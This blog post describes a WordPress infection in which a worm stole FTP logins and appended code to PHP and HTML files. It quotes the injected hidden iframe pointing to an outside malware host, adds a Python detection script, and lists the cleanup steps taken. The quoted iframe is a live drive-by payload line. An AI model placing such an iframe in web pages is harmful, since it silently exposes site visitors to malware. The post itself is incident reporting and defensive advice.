This week I got an error on almost all of my WordPress blogs; it occurred twice in the past 5 days. It really made me worried and giddy, because there was just a blank page with an error message like this:
Warning : Unexpected character in input: ''' (ASCII=39) state=1 in ….
Parse error : syntax error, unexpected '.' in ….
When I checked my files, I found code added at the bottom line of my files, iframe code like this:
<iframe src="http://c9u.at:8080/ts/in.cgi?pepsi147" width=125 height=125 style="visibility: hidden"></iframe>
This line tells me that I have been hacked, infected by a virus / worm.
This is a malware / worm that steals my FTP login information from my FTP programs and modifies lots of php / html / htm pages on all of the sites it can access. In the FTP log file, there are lots of entries showing someone downloading a file and then re-uploading it. It appears to modify the files destructively, overwriting whatever text was there.
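As an added example (not part of the original post): a small Python scanner that walks a site directory and reports hidden iframes in .php / .html / .htm files, such as the appended line shown above. The function names, the 0/1-pixel size heuristic and the sample URL are assumptions constructed for illustration.

```python
import os
import re
import tempfile

TARGET_EXT = (".php", ".html", ".htm")  # file types the post says were modified
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Assumption: "invisible" means hidden via CSS or sized 0/1 pixel.
HIDDEN_RE = re.compile(r"""visibility\s*:\s*hidden|display\s*:\s*none|"""
                       r"""(?:width|height)\s*=\s*["']?[01]\b""", re.IGNORECASE)

def scan_text(text):
    """Return (line_no, src, on_last_line) for each hidden iframe in text."""
    lines = text.splitlines()
    last = max((n for n, l in enumerate(lines, 1) if l.strip()), default=0)
    hits = []
    for no, line in enumerate(lines, 1):
        for tag in IFRAME_RE.findall(line):
            if HIDDEN_RE.search(tag):
                src = SRC_RE.search(tag)
                hits.append((no, src.group(1) if src else "", no == last))
    return hits

def scan_tree(root):
    """Walk root and map each affected file path to its list of hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(TARGET_EXT):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    findings[path] = hits
    return findings

def demo():
    """Scan a constructed two-file site: one clean page, one with an appended frame."""
    injected = ('<iframe src="http://injected.example.invalid:8080/x" width=125 '
                'height=125 style="visibility: hidden"></iframe>')
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "clean.html"), "w") as fh:
            fh.write('<html><iframe src="/video" width=640></iframe></html>\n')
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'hi'; ?>\n" + injected + "\n")
        return {os.path.basename(p): h for p, h in scan_tree(root).items()}

if __name__ == "__main__":
    print(demo())
```

Run `scan_tree` against a local copy of the site after re-uploading clean files; an empty result means no hidden frame matching these heuristics remains.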
Here’s a list of some sources that I found about this issue:
http://wordpress.org/support/topic/268083
http://wordpress.org/support/topic/272140
http://wordpress.org/support/topic/272379
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
The first time I faced this virus, what I did was re-upload the infected files and change my FTP password. I thought I had resolved the problem and that it would not happen again. But I was wrong; today I got this error again.
So now I really know that I need to take serious action to completely remove the worm / malware. I have to ensure my computer is completely clean and that it doesn’t happen again.
According to Hostgator Security Support, in order to protect against future attacks, I need to run full virus and malware scans on my computer to ensure that it is clean.
Hello,
It appears that malicious code has been uploaded to your account via FTP using a compromised username and password. At this time, I have removed the malicious code from the account.
From our experience with malware of this nature, the user account passwords are compromised through viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware. It is highly suggested that you also do the following:
* Any computers legitimately allowed to access the account must be updated fully (Windows updates, browser updates, application updates, anti-virus updates)
* Any computers legitimately allowed to access the account must be completely scanned for viruses and secured completely
Although I’m still not sure that my computer is completely clean, I have taken some actions to protect it:
- Update my FTP password
- Update my FTP software to the newest version
- Of course, re-upload infected files and upgrade my WordPress blog to the latest version
- Scan my whole computer using Malware Bytes from www.malwarebytes.org
That is all I can do for now. I hope this error doesn’t happen again and that the worm is completely removed.